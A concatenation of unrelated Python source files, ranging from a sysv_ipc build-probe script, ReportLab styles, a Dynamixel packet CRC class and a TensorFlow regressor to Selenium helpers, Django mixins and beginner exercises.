lines.append(s[beginning:])
else:
last_space = s[beginning:end].rfind(' ')
lines.append(s[beginning:beginning + last_space])
beginning += (last_space + 1)
end = beginning + MAX_LINE_LENGTH - 1
return lines
def print_bad_news(value_name, default):
s = "Setup can't determine %s on your system, so it will default to %s which may not " + \
"be correct."
s = s % (value_name, default)
plea = "Please report this message and your operating system info to the package " + \
"maintainer listed in the README file."
lines = line_wrap_paragraph(s) + [''] + line_wrap_paragraph(plea)
border = '*' * MAX_LINE_LENGTH
s = border + "\n* " + ('\n* '.join(lines)) + '\n' + border
print(s)
def does_build_succeed(filename):
# Utility function that returns True if the file compiles and links
# successfully, False otherwise.
cmd = "cc -Wall -I%s -o ./prober/foo ./prober/%s" % \
(PYTHON_INCLUDE_DIR, filename)
p = subprocess.Popen(cmd, shell=True, stdout=STDOUT, stderr=STDERR)
# p.wait() returns the process' return code, so 0 implies that
# the compile & link succeeded.
return not bool(p.wait())
def compile_and_run(filename, linker_options=""):
# Utility function that returns the stdout output from running the
# compiled source file; None if the compile fails.
cmd = "cc -Wall -I%s -o ./prober/foo %s ./prober/%s" % \
(PYTHON_INCLUDE_DIR, linker_options, filename)
p = subprocess.Popen(cmd, shell=True, stdout=STDOUT, stderr=STDERR)
if p.wait():
# uh-oh, compile failed
return None
else:
s = subprocess.Popen(["./prober/foo"],
stdout=subprocess.PIPE).communicate()[0]
return s.strip().decode()
def sniff_semtimedop():
return does_build_succeed("semtimedop_test.c")
def sniff_union_semun_defined():
# AFAICT the semun union is supposed to be declared in one's code.
# However, a lot of legacy code gets this wrong and some header files
# define it, e.g.sys/sem.h on OS X where it's #ifdef-ed so that legacy
# code won't break. On some systems, it appears and disappears based
# on the #define value of _XOPEN_SOURCE.
return does_build_succeed("sniff_union_semun_defined.c")
def probe_semvmx():
# At present, this is hardcoded and that seems fine on all systems I've tested.
# https://github.com/osvenskan/sysv_ipc/issues/3
semvmx = 32767
return semvmx
def probe_page_size():
DEFAULT_PAGE_SIZE = 4096
page_size = compile_and_run("probe_page_size.c")
if page_size is None:
page_size = DEFAULT_PAGE_SIZE
print_bad_news("the value of PAGE_SIZE", page_size)
return page_size
def probe():
d = {"KEY_MAX": "LONG_MAX",
"KEY_MIN": "LONG_MIN"
}
# conditionals contains preprocessor #defines to be written to probe_results.h that might
# already be defined on some platforms. Any symbol in this list will be surrounded with
# preprocessor directives #ifndef/#endif in probe_results.h.
# If a symbol is in this list but isn't written to probe_results.h, no harm done.
conditionals = ["_SEM_SEMUN_UNDEFINED",
# PAGE_SIZE is already #defined elsewhere on FreeBSD.
"PAGE_SIZE",
]
with open("VERSION") as f:
version = f.read().strip()
d["SYSV_IPC_VERSION"] = f'"{version}"'
d["PAGE_SIZE"] = probe_page_size()
if sniff_semtimedop():
d["SEMTIMEDOP_EXISTS"] = ""
d["SEMAPHORE_VALUE_MAX"] = probe_semvmx()
# Some (all?) Linux platforms #define _SEM_SEMUN_UNDEFINED if it's up
# to my code to declare this union, so I use that flag as my standard.
if not sniff_union_semun_defined():
d["_SEM_SEMUN_UNDEFINED"] = ""
msg = """/*
This header file was generated when you ran setup. Once created, the setup
process won't overwrite it, so you can adjust the values by hand and
recompile if you need to.
To enable lots of debug output, add this line and re-run setup.py:
#define SYSV_IPC_DEBUG
To recreate this file, just delete it and re-run setup.py.
KEY_MIN, KEY_MAX and SEMAPHORE_VALUE_MAX are stored internally in longs, so
you should never #define them to anything larger than LONG_MAX regardless of
what your operating system is capable of.
*/
"""
filename = "probe_results.h"
if not os.path.exists(filename):
lines = []
for key in d:
if key in conditionals:
lines.append("#ifndef %s" % key)
lines.append("#define %s\t\t%s" % (key, d[key]))
if key in conditionals:
lines.append("#endif")
# A trailing '\n' keeps compilers happy...
with open(filename, "w") as f:
f.write(msg + '\n'.join(lines) + '\n')
return d
if __name__ == "__main__":
s = probe()
print(s)
|
import os
import h5py
import numpy as np
import json
import glob
import pysrt
from tqdm import tqdm
from PIL import Image
from utils import read_json_lines, load_json, save_json
import cv2 as cv
rgb_path = "/home/scw/Downloads/tvqa_new/frames_hq/"
of_path = "/home/scw/CLionProjects/optical_flow/cmake-build-release/optical_flow_hq/"
hf = h5py.File("whole_data.h5", "w")
def make_h5():
group = hf.create_group("video")
#j = 0
for show_root_directory in os.listdir(rgb_path):
print show_root_directory
show_group = group.create_group(show_root_directory)
for clip in tqdm(os.listdir(rgb_path + show_root_directory)):
rgb_group = show_group.create_group("rgb_" + clip)
of_group = show_group.create_group("of_" + clip)
i = 0
for rgb_image in os.listdir(rgb_path + show_root_directory + "/" + clip):
image = Image.open(rgb_path + show_root_directory + "/" + clip + '/' + rgb_image)
image = image.resize((224, 224))
rgb_group.create_dataset('{:03d}'.format(i+1), data=np.array(image, dtype=np.float32), compression="gzip")
i += 1
i = 0
for of_image in os.listdir(of_path + show_root_directory + "/" + clip):
image = Image.open(of_path + show_root_directory + "/" + clip + '/' + of_image)
image = image.resize((224, 224))
of_group.create_dataset('{:03d}'.format(i+1), data=np.array(image, dtype=np.float32), compression="gzip")
i += 1
if __name__ == '__main__':
make_h5()
|
# -*- coding: utf-8 -*-
"""
This is the module ``report_defines.py`` for report generation by
simulation in Typhoon HIL API in Python.
Reserved to some value and text definitions for the report used in
``Report_function.py`` module.
Test Name: Modulation performance test
Description: This test set evaluates the performance of modulation
algorithms for grid-tied inverters. The tests are performed in open-loop,
where the grid is replaced by a variable RL load.
@author: Grupo de Eletrônica de Potência e Controle (GEPOC);
Tiarles Guterres (1°/2019)
Modules tree:
report_run (Top-Level)
| -> report_function
| -> report_defines <- This file
| -> report_parameters
| -> simulation_functions
| -> Interface_module
"""
from reportlab.lib.styles import getSampleStyleSheet
from reportlab.lib.enums import TA_JUSTIFY, TA_LEFT, TA_CENTER
from reportlab.lib.units import cm
from reportlab.lib import colors
from reportlab.lib.pagesizes import A4
import numpy as np
MSG_NOT_COMPLY = '<font color="red">Failed</font>'
MSG_COMPLY = '<font color="green">OK</font>'
### SIZES
width, height = A4
margins = {'right': 2.54*cm, 'left': 2.54*cm, 'top': 2.54*cm,
'bottom': 1.25*cm}
# efective width
ef_width = np.floor(width - margins['left'] - margins['right'])
# efective height
ef_height = np.floor(height - margins['top'] - margins['bottom'])
### COLORS
darkblue = colors.Color(23.0/255,54.0/255,93.0/255)
blue = colors.Color(54.0/255,95.0/255,145.0/255)
lightblue = colors.Color(79.0/255,129.0/255,189.0/255)
grey = colors.Color(128.0/255,128.0/255,128.0/255)
### TEXT STYLE: used for wrapping data on flowables
styles = getSampleStyleSheet()
normal_style = styles["BodyText"]
normal_style.alignment = TA_JUSTIFY
normal_style.wordWrap = 1
normal_style.fontName = 'Verdana'
normal_style.fontSize = 10
normal_style.firstLineIndent = 0
normal_style.leftIndent = 0
normal_style.leading = normal_style.fontSize*1.5
normal_style.spaceAfter = 0
normal_style_l = styles["BodyText"]
normal_style_l.alignment = TA_LEFT
normal_style_l.wordWrap = 1
normal_style_l.fontName = 'Verdana'
normal_style_l.fontSize = 10
normal_style_l.firstLineIndent = 0
normal_style_l.leftIndent = 0
normal_style_l.leading = normal_style.fontSize*1.5
normal_style_l.spaceAfter = 0
title_style = styles["Title"]
title_style.alignment = TA_LEFT
title_style.wordWrap = 1
title_style.fontName = 'Cambria'
title_style.fontSize = 26
title_style.firstLineIndent = 0
title_style.leftLineIndent = 0
title_style.leading = title_style.fontSize
title_style.spaceAfter = 0
title_style.spaceBefore = 0
title_1_style = styles["Heading1"]
title_1_style.alignment = TA_LEFT
title_1_style.wordWrap = 1
title_1_style.fontName = 'Cambria Bold'
title_1_style.fontSize = 16
title_1_style.firstLineIndent = 0
title_1_style.leftLineIndent = 0
title_1_style.leading = 0*title_1_style.fontSize
title_1_style.spaceAfter = 0
title_1_style.spaceBefore = 0
title_2_style = styles["Heading2"]
title_2_style.alignment = TA_LEFT
title_2_style.wordWrap = 1
title_2_style.fontName = 'Cambria'
title_2_style.fontSize = 14
title_2_style.firstLineIndent = 0
title_2_style.leftLineIndent = 0
title_2_style.leading = title_2_style.fontSize
title_2_style.spaceAfter = 10
title_2_style.spaceBefore = 0
v10_style = styles["Heading6"]
v10_style.alignment = TA_LEFT
v10_style.wordWrap = 1
v10_style.fontName = 'Verdana'
v10_style.fontSize = 10
v10_style.firstLineIndent = 0
v10_style.leftLineIndent = 0
v10_style.leading = v10_style.fontSize*1.5
c10_style = styles["Heading5"]
c10_style.alignment = TA_LEFT
c10_style.wordWrap = 1
c10_style.fontName = 'Verdana'
c10_style.fontSize = 10
c10_style.firstLineIndent = 0
c10_style.leftLineIndent = 0
c10_style.leading = c10_style.fontSize
djv10bi_style = styles["Heading4"]
djv10bi_style.alignment = TA_LEFT
djv10bi_style.wordWrap = 1
djv10bi_style.fontName = 'Dejavusans Bold Italic'
djv10bi_style.fontSize = 10
djv10bi_style.firstLineIndent = 0
djv10bi_style.leftLineIndent = 0
djv10bi_style.leading = djv10bi_style.fontSize
legend_style = styles["Heading3"]
legend_style.alignment = TA_CENTER
legend_style.wordWrap = 1
legend_style.fontName = 'Verdana'
legend_style.fontSize = 9
legend_style.firstLineIndent = 0
legend_style.leftLineIndent = 0
legend_style.leading = legend_style.fontSize
table_style = styles["Normal"]
table_style.alignment = TA_CENTER
table_style.wordWrap = 1
table_style.fontName = 'Verdana'
table_style.fontSize = 8
table_style.leading = 0.4*cm
#Table_style = styles["Normal"]
#Table_style.alignment = TA_CENTER
#Table_style.wordWrap = 1
#Table_style.fontName = 'Verdana'
#Table_style.fontSize = 8
#Table_style.leading = 0.4*cm
|
class Conta():
def __init__ (self, clientes, numero, saldo = 0, operacoes = []):
self.clientes = clientes
self.numero = numero
self.saldo = saldo
self.operacoes = operacoes
def resumo(self):
print(f"CC Número {self.numero} \nSaldo: {self.saldo}")
def saque(self, quantidade):
if quantidade <= self.saldo:
self.saldo -= quantidade
array = ['Saque', quantidade]
self.operacoes.append(array)
return True
else:
return False
def deposito(self, valor):
self.saldo += valor
array = ['Deposito', valor]
self.operacoes.append(array)
def extrato(self):
print(f"\nExtrato CC N* {self.numero}")
for o in self.operacoes:
print(f"{o[0]} : {o[1]} ")
print(f"\nSaldo: {self.saldo}")
class ContaEspecial(Conta):
def __init__(self, clientes, numero, saldo = 0, limite = 0):
Conta.__init__(self, clientes, numero, saldo)
self.limite = limite
conta_1 = Conta('Arthur', 100, 1200)
conta_2 = ContaEspecial('Arthur', 100, 2200, 2400)
print("Conta 1: ")
print(conta_1.saque(1200)) # True
print(conta_1.saldo) # 0
print(conta_1.deposito(2400))
conta_1.extrato()
print("\n")
print("Conta 2: ")
print(conta_2.saque(1200))
print(conta_2.saldo) # 0
|
import struct
import perilib
class RobotisDynamixel2Packet(perilib.StreamPacket):
TYPE_INSTRUCTION = 0
TYPE_STATUS = 1
TYPE_STR = ["instruction", "status"]
TYPE_ARG_CONTEXT = ["outgoing_args", "incoming_args"]
crc_table = [
0x0000, 0x8005, 0x800F, 0x000A, 0x801B, 0x001E, 0x0014, 0x8011,
0x8033, 0x0036, 0x003C, 0x8039, 0x0028, 0x802D, 0x8027, 0x0022,
0x8063, 0x0066, 0x006C, 0x8069, 0x0078, 0x807D, 0x8077, 0x0072,
0x0050, 0x8055, 0x805F, 0x005A, 0x804B, 0x004E, 0x0044, 0x8041,
0x80C3, 0x00C6, 0x00CC, 0x80C9, 0x00D8, 0x80DD, 0x80D7, 0x00D2,
0x00F0, 0x80F5, 0x80FF, 0x00FA, 0x80EB, 0x00EE, 0x00E4, 0x80E1,
0x00A0, 0x80A5, 0x80AF, 0x00AA, 0x80BB, 0x00BE, 0x00B4, 0x80B1,
0x8093, 0x0096, 0x009C, 0x8099, 0x0088, 0x808D, 0x8087, 0x0082,
0x8183, 0x0186, 0x018C, 0x8189, 0x0198, 0x819D, 0x8197, 0x0192,
0x01B0, 0x81B5, 0x81BF, 0x01BA, 0x81AB, 0x01AE, 0x01A4, 0x81A1,
0x01E0, 0x81E5, 0x81EF, 0x01EA, 0x81FB, 0x01FE, 0x01F4, 0x81F1,
0x81D3, 0x01D6, 0x01DC, 0x81D9, 0x01C8, 0x81CD, 0x81C7, 0x01C2,
0x0140, 0x8145, 0x814F, 0x014A, 0x815B, 0x015E, 0x0154, 0x8151,
0x8173, 0x0176, 0x017C, 0x8179, 0x0168, 0x816D, 0x8167, 0x0162,
0x8123, 0x0126, 0x012C, 0x8129, 0x0138, 0x813D, 0x8137, 0x0132,
0x0110, 0x8115, 0x811F, 0x011A, 0x810B, 0x010E, 0x0104, 0x8101,
0x8303, 0x0306, 0x030C, 0x8309, 0x0318, 0x831D, 0x8317, 0x0312,
0x0330, 0x8335, 0x833F, 0x033A, 0x832B, 0x032E, 0x0324, 0x8321,
0x0360, 0x8365, 0x836F, 0x036A, 0x837B, 0x037E, 0x0374, 0x8371,
0x8353, 0x0356, 0x035C, 0x8359, 0x0348, 0x834D, 0x8347, 0x0342,
0x03C0, 0x83C5, 0x83CF, 0x03CA, 0x83DB, 0x03DE, 0x03D4, 0x83D1,
0x83F3, 0x03F6, 0x03FC, 0x83F9, 0x03E8, 0x83ED, 0x83E7, 0x03E2,
0x83A3, 0x03A6, 0x03AC, 0x83A9, 0x03B8, 0x83BD, 0x83B7, 0x03B2,
0x0390, 0x8395, 0x839F, 0x039A, 0x838B, 0x038E, 0x0384, 0x8381,
0x0280, 0x8285, 0x828F, 0x028A, 0x829B, 0x029E, 0x0294, 0x8291,
0x82B3, 0x02B6, 0x02BC, 0x82B9, 0x02A8, 0x82AD, 0x82A7, 0x02A2,
0x82E3, 0x02E6, 0x02EC, 0x82E9, 0x02F8, 0x82FD, 0x82F7, 0x02F2,
0x02D0, 0x82D5, 0x82DF, 0x02DA, 0x82CB, 0x02CE, 0x02C4, 0x82C1,
0x8243, 0x0246, 0x024C, 0x8249, 0x0258, 0x825D, 0x8257, 0x0252,
0x0270, 0x8275, 0x827F, 0x027A, 0x826B, 0x026E, 0x0264, 0x8261,
0x0220, 0x8225, 0x822F, 0x022A, 0x823B, 0x023E, 0x0234, 0x8231,
0x8213, 0x0216, 0x021C, 0x8219, 0x0208, 0x820D, 0x8207, 0x0202
]
def prepare_buffer_after_building(self):
# perform byte stuffing on payload
stuffed_buffer = []
stuffing_needed = False
seen = [self.metadata["instruction"]]
for b in self.buffer:
stuffed_buffer.append(b)
if b == 0xFF and len(seen) == 0:
seen.append(b)
elif b == 0xFF and len(seen) == 1:
seen.append(b)
elif b == 0xFD and len(seen) == 2:
# stuff an extra 0xFD byte and reset status
stuffing_needed = True
stuffed_buffer.append(0xFD)
seen = []
else:
# pattern broken, reset
seen = []
# replace original buffer with stuffed one
if stuffing_needed:
self.buffer = bytes(stuffed_buffer)
# build header (SOF, servo ID, length, and instruction data)
header = struct.pack("<5BHB",
0xFF, 0xFF, 0xFD, 0x00,
self.metadata["id"], len(self.buffer) + 3, self.metadata["instruction"])
# prepend header to buffer
self.buffer = header + self.buffer
# calculate CRC16-IBM and build footer (CRC16 IBM mechanism)
self.metadata["crc"] = self.update_crc(0, self.buffer)
self.buffer = self.buffer + struct.pack("<H", self.metadata["crc"])
def update_crc(self, crc_accum, data_blk):
for b in data_blk:
i = ((crc_accum >> 8) ^ b) & 0xFF
crc_accum = ((crc_accum << 8) ^ RobotisDynamixel2Packet.crc_table[i]) & 0xFFFF
return crc_accum
|
import numpy as np
import operator
def twodim(mat):
len_mat = len(mat)
if len_mat == 1:
return 'Matriz de 1 elemento'
elif len_mat == 2:
return 'Matriz de 2 elementos'
elif len_mat == 3:
return 'Matriz de 3 elementos'
def twodim_recursivo(mat1):
len_mat1 = len(mat1)
while len_mat1 < 1:
len_mat1 = len_mat1 + 1
return len_mat1
# Next, we will write a function that checks for the number of rows and columns of a matrix.
# Recall that the outer list will tell us the number of rows and the inner lists will tell us the number of columns.
# Make sure that all inner lists are of the same length.
def rowcolumn(mat):
cont_col, cont_row = 0, 0
cont_col2 = 0
for x in mat:
cont_row = cont_row+1
for y in x:
cont_col = cont_col + 1
cont_col2 = cont_col/cont_row
return cont_row, cont_col2
def compare(mat1, mat2):
for x in mat1:
print(x)
for y in mat2:
print(y)
#print(compare([[1,2,3],[4,5,6]], [[7,8,9], [10,11,12]]))
a = [1, 2, 3]
b = [4, 5, 6]
print(a)
def addition(mat1, mat2):
# This function takes a two lists of lists and adds each cell together
# Input: two list of lists
# Output: one summed list of lists
#
# Sample input: [[1,2,3],[4,5,6]], [[7,8,9], [10,11,12]]
# Sample Output: [[8,10,12],[14,16,18]]
# Your code here:
add = [[0, 0, 0], [0, 0, 0]]
for x in range(len(mat1)):
for y in range(len(mat1[0])):
add[x][y] = mat1[x][y] + mat2[x][y]
return add
#print(addition([[1, 2, 3], [4, 5, 6]], [[7, 8, 9], [10, 11, 12]]))
class Matrix2D:
# First, we will write the __init__ function.
# In this function, we will initialize rows and the columns using the matrix that we have passed to the class.
def __init__(self, mat):
self.mat = mat
# Assign mat to self.mat
# Assign rows and cols to self.rows and self.cols
# To find the rows and the cols, use the rowcolumn function and pass self.mat to the function.
# Since the rowcolumn function is now a member of the class, make sure to refer to the function as self.rowcolumn
# Your code here:
# Insert the twodim function here.
# The only change you need to make is that now we are passing self and mat to the function (make sure self is first).
# Your code here:
def twodim(self, mat):
len_mat = len(mat)
if len_mat == 1:
return 'Matriz de 1 elemento'
elif len_mat == 2:
return 'Matriz de 2 elementos'
elif len_mat == 3:
return 'Matriz de 3 elementos'
# Insert the rowcolumn function here.
# The changes you need to make:
# 1. The function now takes self and mat as arguments (make sure to pass self first).
# 2. Any reference to twodim will be changed to self.twodim since this function is a member of the class and takes self
# Your code here:
def rowcolumn(self, mat):
cont_col, cont_row = 0, 0
cont_col2 = 0
for x in mat:
cont_row = cont_row + 1
for y in x:
cont_col = cont_col + 1
cont_col2 = cont_col / cont_row
return cont_row, cont_col2
# Insert the compare function here
# Add self as the first argument passed to the function
# Your code here:
def compare(self, mat1, mat2):
# This function takes a two lists of lists and checks whether they have the same number of rows and columns
# Input: two list of lists
# Output: True or False
#
# Sample input: [[1,2,3],[4,5,6]], [[7,8,9], [10,11,12]]
# Sample Output: True
# Your code here:
len_mat1 = len(mat1)
len_mat2 = len(mat2)
if len_mat1 == len_mat2:
return True
else:
return False
# Insert the addition function here
# This function now takes self and matrix (another matrix of the Matrix2D class)
# Change the compare function to self.compare
# Change any reference to mat1 and mat2 to self.mat and matrix.mat respectively
# Return your result as a Matrix2D(result). This will ensure that we return a new matrix and not a list of lists.
# Your code here:
def addition(self,mat1,mat2):
np.add((mat1,mat2))
def addition(self, mat1, mat2):
add = [[0, 0, 0], [0, 0, 0]]
for x in range(len(mat1)):
for y in range(len(mat1[0])):
add[x][y] = mat1[x][y] + mat2[x][y]
return add
print(Matrix2D([[1,2,3],[4,5,6]]).addition(Matrix2D([[7,8,9],[10,11,12]])).mat)
|
import itertools
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import tensorflow as tf
from sklearn.ensemble import IsolationForest
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import MinMaxScaler
# CONSTANTS
ITERATIONS = 10000
LABEL = 'AdoptionSpeed'
HIDDEN_UNITS = [200, 100, 50, 25, 12]
TRAINING_TEST_SPLIT = 0.20
RANDOM_NUMBER_SEED = 42
def prepare_data(data):
pet_id = data.PetID
# Remove unused features
data.drop(['RescuerID', 'Description', 'PetID', 'State'], axis=1, inplace=True)
# Apply binning to ages
data['Age'] = pd.cut(data['Age'], [-1, 2, 3, 6, 255], labels=[0, 1, 2, 3])
# Apply binning to fee
data['Fee'] = pd.cut(data['Fee'], [-1, 50, 100, 200, 3000], labels=[0, 1, 2, 3])
# Apply binning to photo amount
data['PhotoAmt'] = pd.cut(data['PhotoAmt'], [-1, 1, 5, 10, 100], labels=[0, 1, 2, 3])
# Apply binning to video amount
data['VideoAmt'] = pd.cut(data['VideoAmt'], [-1, 1, 100], labels=[0, 1])
# Replace names with 1 is present, 0 if not present
data.loc[data['Name'].notnull(), 'Name'] = 1
data.loc[data['Name'].isnull(), 'Name'] = 0
# Fill missing continuous data
data_continuous = data.select_dtypes(exclude=['object'])
data_continuous.fillna(0, inplace=True)
# Fill missing string data
data_categorical = data.select_dtypes(include=['object'])
data_categorical.fillna('NONE', inplace=True)
final_data = data_continuous.merge(data_categorical, left_index=True, right_index=True)
return final_data, data_categorical, data_continuous, pet_id
def input_function(data_set, training=True):
continuous_cols = {key: tf.constant(data_set[key].values) for key in features_continuous}
categorical_cols = {
key: tf.SparseTensor(indices=[[i, 0] for i in range(data_set[key].size)],
values=data_set[key].values,
dense_shape=[data_set[key].size, 1])
for key in features_categorical}
# Merges the dictionaries
feature_cols = dict(list(continuous_cols.items()) + list(categorical_cols.items()))
if training:
# Convert the label column into a constant Tensor
label = tf.constant(data_set[LABEL].values)
return feature_cols, label
return feature_cols
if __name__ == '__main__':
tf.logging.set_verbosity(tf.logging.INFO)
# Import and split
train, train_categorical, train_continuous, train_pet_id = prepare_data(pd.read_csv('../all/train.csv'))
test, test_categorical, test_continuous, test_pet_id = prepare_data(pd.read_csv('../all/test/test.csv'))
# Remove the outliers
clf = IsolationForest(max_samples=100, random_state=RANDOM_NUMBER_SEED)
clf.fit(train_continuous)
y_no_outliers = clf.predict(train_continuous)
y_no_outliers = pd.DataFrame(y_no_outliers, columns=['Top'])
train_continuous = train_continuous.iloc[y_no_outliers[y_no_outliers['Top'] == 1].index.values]
train_continuous.reset_index(drop=True, inplace=True)
train_categorical = train_categorical.iloc[y_no_outliers[y_no_outliers['Top'] == 1].index.values]
train_categorical.reset_index(drop=True, inplace=True)
train = train.iloc[y_no_outliers[y_no_outliers['Top'] == 1].index.values]
train.reset_index(drop=True, inplace=True)
# Extract columns
columns = list(train_continuous.columns)
features_continuous = list(train_continuous.columns)
features_continuous.remove(LABEL)
features_categorical = list(train_categorical.columns)
# Extract matrices
matrix_train = np.matrix(train_continuous)
matrix_test = np.matrix(test_continuous)
matrix_test_no_label = np.matrix(train_continuous.drop(LABEL, axis=1))
matrix_y = np.array(train.AdoptionSpeed)
# Scale data
y_scaler = MinMaxScaler()
y_scaler.fit(matrix_y.reshape(matrix_y.shape[0], 1))
train_scaler = MinMaxScaler()
train_scaler.fit(matrix_train)
test_scaler = MinMaxScaler()
test_scaler.fit(matrix_test_no_label)
matrix_train_scaled = pd.DataFrame(train_scaler.transform(matrix_train), columns=columns)
test_matrix_scaled = pd.DataFrame(test_scaler.transform(matrix_test), columns=features_continuous)
train[columns] = pd.DataFrame(train_scaler.transform(matrix_train), columns=columns)
test[features_continuous] = test_matrix_scaled
# Extract continuous and categorical features
engineered_features = []
for continuous_feature in features_continuous:
engineered_features.append(tf.contrib.layers.real_valued_column(continuous_feature))
for categorical_feature in features_categorical:
sparse_column = tf.contrib.layers.sparse_column_with_hash_bucket(categorical_feature, hash_bucket_size=1000)
engineered_features.append(tf.contrib.layers.embedding_column(sparse_id_column=sparse_column,
dimension=16,
combiner='sum'))
# Split training set data between train and test
x_train, x_test, y_train, y_test = train_test_split(train[features_continuous + features_categorical],
train[LABEL],
test_size=TRAINING_TEST_SPLIT,
random_state=RANDOM_NUMBER_SEED)
# Convert back to DataFrame
y_train = pd.DataFrame(y_train, columns=[LABEL])
x_train = pd.DataFrame(x_train, columns=features_continuous + features_categorical) \
.merge(y_train, left_index=True, right_index=True)
y_test = pd.DataFrame(y_test, columns=[LABEL])
x_test = pd.DataFrame(x_test, columns=features_continuous + features_categorical) \
.merge(y_test, left_index=True, right_index=True)
# Deep neural network model
regressor = tf.contrib.learn.DNNRegressor(feature_columns=engineered_features,
activation_fn=tf.nn.relu,
hidden_units=HIDDEN_UNITS)
# Train model
regressor.fit(input_fn=lambda: input_function(x_train), steps=ITERATIONS)
# Evaluate model
evaluation = regressor.evaluate(input_fn=lambda: input_function(x_test, training=True), steps=1)
# Predictions
y = regressor.predict(input_fn=lambda: input_function(x_test))
predictions = list(itertools.islice(y, x_test.shape[0]))
predictions = pd.DataFrame(y_scaler.inverse_transform(np.array(predictions).reshape(len(predictions), 1)))
# Compute accuracy
rounded_predictions = predictions.round()
reality = pd.DataFrame(train_scaler.inverse_transform(x_test), columns=[columns])[LABEL]
matching = rounded_predictions.where(reality.values == rounded_predictions.values)
accuracy = matching.count()[0] / len(reality) * 100
# Print metrics
print('Final loss on testing set: {0:f}'.format(evaluation['loss']))
print('Final accuracy: {0:.2f}%'.format(accuracy))
# Plot final results
matplotlib.rc('xtick', labelsize=30)
matplotlib.rc('ytick', labelsize=30)
fig, ax = plt.subplots(figsize=(50, 40))
plt.style.use('ggplot')
plt.plot(predictions.values, reality.values, 'ro')
plt.xlabel('Predictions', fontsize=30)
plt.ylabel('Reality', fontsize=30)
plt.title('Predictions x Reality on dataset Test', fontsize=30)
ax.plot([reality.min(), reality.max()], [reality.min(), reality.max()], 'k--', lw=4)
plt.show()
|
import time
from selenium.webdriver.common.by import By
from selenium.webdriver.support.wait import WebDriverWait
from wheel.signatures import assertTrue
from features.pages.page_selector import LoginPageLocator, OrganizationPopup, HomePageLocator
from selenium.webdriver.support import expected_conditions as EC
def login(context, email, password):
context.browser.find_element(*LoginPageLocator.EMAIL_FIELD).send_keys(email)
context.browser.find_element(*LoginPageLocator.PASSWORD_FIELD).send_keys(password)
context.browser.find_element(*LoginPageLocator.SIGNIN_BUTTON).click()
# Organization
def clear_organizations(context):
listtt = len(context.browser.find_elements(*OrganizationPopup.ORGS_COUNT))
if listtt != 0:
for i in range(listtt):
time.sleep(1)
context.browser.find_element(By.XPATH, "//div[@class='columns-wrapper']/div[1]//a[@class='organization-name']").click()
time.sleep(0.5)
context.browser.find_element(By.XPATH, ".//span[text()='Delete organization']").click()
time.sleep(0.5)
context.browser.find_element(By.XPATH, ".//a[text()='Delete organization']").click()
time.sleep(0.5)
context.browser.find_element(By.XPATH, ".//a[text()='Delete']").click()
time.sleep(1.5)
else:
print ("List is empty")
def create_organization(context, name):
context.browser.find_element(*HomePageLocator.My_organizations_btn).click()
time.sleep(1)
btn = context.browser.find_element(*HomePageLocator.Create_new_organization_btn)
assertTrue(btn)
context.browser.find_element(*HomePageLocator.Create_new_organization_btn).click()
time.sleep(5)
context.browser.find_element(*OrganizationPopup.TITLE).send_keys(name)
context.browser.find_element(*OrganizationPopup.DESC).send_keys("Test organization")
context.browser.find_element(*OrganizationPopup.SUBMIT).click()
time.sleep(1) |
#!/usr/bin/python3
"""
Start link class to table in database
"""
import sys
from model_state import Base, State
from sqlalchemy import (create_engine)
if __name__ == "__main__":
usr = argv[1]
pwd = argv[2]
db_name = argv[3]
engine = create_engine('mysql+mysqldb://{}:{}@localhost/{}'.
format(usr, pwd, db_name), pool_pre_ping=True)
Base.metadata.create_all(engine)
|
# coding: utf-8
# 自分の得意な言語で
# Let's チャレンジ!!
input_line = input()
s = ""
for i in range(int(input_line)):
s += "*"
print(s)
|
import numpy as np
"""task 1"""
m = np.ones((3, 3))
"""task 2"""
m = np.vstack((m, [2, 2, 2]))
m = np.hstack((m, [[3], [3], [3], [3]]))
print(m)
|
a = []
x = input("please input numbers with space between them \n").split()
h = len(x)
y = 0
for i in range(0,h):
a.append(int(x[y]))
y = y + 1
a.sort()
z = len(a) - 1
w = str(a)
w = w.replace("[", "")
w = w.replace("]", "")
w = w.replace(",", "")
print(w)
print("The smallest number among the input is" , a[0] , "and the largest is" , a[z]) |
import os
import jieba
def cn_ci(dir_path):
all_text = ""
for file_name in os.listdir(dir_path):
if file_name.find(".txt") != -1:
file_path = "/".join([dir_path, file_name])
with open(file_path, "rb") as f:
all_text = f.read()#.decode("utf-8")
with open(file_path, "w",encoding='utf-8') as f:
terms = jieba.cut(all_text)
terms = [i for i in terms if(len(str(i).strip())!=0)]
terms = {}.fromkeys(terms).keys()
f.write(' '.join(terms)+' ')
#cn_ci("cn_texts")
|
x = int(input("Insert number "))
if x % 2 == 0:
print("Number is even")
else:
print("Number is not even")
|
#공통 요인을 위한 슈퍼 클래스 생성
class Employee:
def __init__(self, name):
self.name = name
def doWork( self ):
print( 'Employee {0}는 '.format( self.name ), end = '')
#상속받으려면 괄호 안에 슈퍼클래스명 입력
#파이썬은 단일 상속만 지원 ( 다중 상속은 미지원 )
class RegularEmployee( Employee ):
def __init__( self, name, age):
super().__init__(name)
self.age = age
def doWork( self ):
super().doWork()
print( '일반적인 사무업무 수행' )
class SalesEmployee( Employee ):
def __init__( self, name, age ):
super().__init__(name)
self.age = age
def doWork( self ):
super().doWork()
print( '영업업무를 수행' )
def main():
regularEmployee = RegularEmployee('Hong', 25)
salesEmployee = SalesEmployee('Kim', 30)
regularEmployee.doWork()
salesEmployee.doWork()
if __name__ == '__main__':
main() |
"""
all mixins are defined here
"""
from django.contrib.auth.views import redirect_to_login
from django.contrib.auth.models import Group
from django.http import Http404
class RequireLoginMixin:
"""
Login Required before accessing the view
"""
def dispatch(self, request, *args, **kwargs):
# print(request.user.groups.all())
if not request.user.is_authenticated:
return redirect_to_login(request.get_full_path())
return super(RequireLoginMixin, self).dispatch(
request, *args, **kwargs)
class IsTSO:
"""
User should belong to the TSO group to access this webpage
"""
def dispatch(self, request, *args, **kwargs):
# tso = Group.objects.get(name='tso')
# print(request.user.groups)
if not request.user.groups.filter(name='tso').exists():
raise Http404(
f'User not allowed to access {request.get_full_path()}')
return super(IsTSO, self).dispatch(request, *args, **kwargs)
class IsTMO:
"""
User should belong to the TMO group to access this webpage
"""
def dispatch(self, request, *args, **kwargs):
# tmo = Group.objects.get(name='tmo')
# print(request.user.groups)
if not request.user.groups.filter(name='tmo').exists():
raise Http404(
f'User not allowed to access {request.get_full_path()}')
return super(IsTMO, self).dispatch(request, *args, **kwargs)
class IsRDO:
"""
User should belong to the TMO group to access this webpage
"""
